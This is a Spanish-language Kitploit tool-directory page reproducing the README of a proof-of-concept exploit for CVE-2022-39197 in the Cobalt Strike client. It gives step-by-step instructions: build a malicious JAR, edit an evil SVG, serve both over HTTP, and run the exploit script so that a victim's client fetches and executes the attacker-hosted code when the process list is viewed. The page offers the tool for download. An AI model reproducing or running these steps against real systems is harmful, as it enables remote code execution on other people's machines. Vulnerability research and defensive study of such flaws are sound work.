Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-39197-RCE — CVE-2022-39197 RCE POC | Kitploit
Herramientas/GitHubGitHub/thecryinggame/cve-2022-39197-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlDesarrollo de Payloads
GitHubthecryinggame/cve-2022-39197-rce

CVE-2022-39197-RCE

CVE-2022-39197 RCE POC

Ver Repositorio
13454hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-39197-RCE

Primero

Este proyecto fue modificado a partir del proyecto de @its-arun https://github.com/its-arun/CVE-2022-39197

Cuando probé el script, descubrí que el script de frida no podía consultar los datos en el orden normal. El método consiste en modificar el script de frida para modificar el nombre del proceso.

Gracias al Maestro @Kai5174 por su contribución al método de explotación.

Uso

  • Preparar el Payload

1、Edite el comando ejecutado con su payload en EvilJar/src/main/java/Exploit.java, actualmente solo puede abrir la calculadora.

2、Compile usando jar mvn clean compile assembly:single

4、Mueva EvilJar-1.0-jar-with-dependencies.jar de EvilJar/target/ a la carpeta serve/

5、Edite serve\evil.svg y reemplace

Descargar herramienta
[attacker]

6、Sirva usando python3 -m http.server 8080

7、Genere beacon.exe con versión de C2 menor o igual a 4.7

8、Debe ejecutar el script de Python en un sistema Windows para conectarse, y realizar contramedidas cuando el cliente acceda a la lista de procesos y vea el proceso beacon.exe.

  • Ejecutar el Exploit
root@kitploit:~
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg

El payload se activará tan pronto como el usuario se desplace por la Lista de Procesos.

POC

Windows 1.png

Mac 2.jpg

Referencias

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Hay un gran análisis en profundidad de esta vulnerabilidad https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

Modificado de https://github.com/its-arun/CVE-2022-39197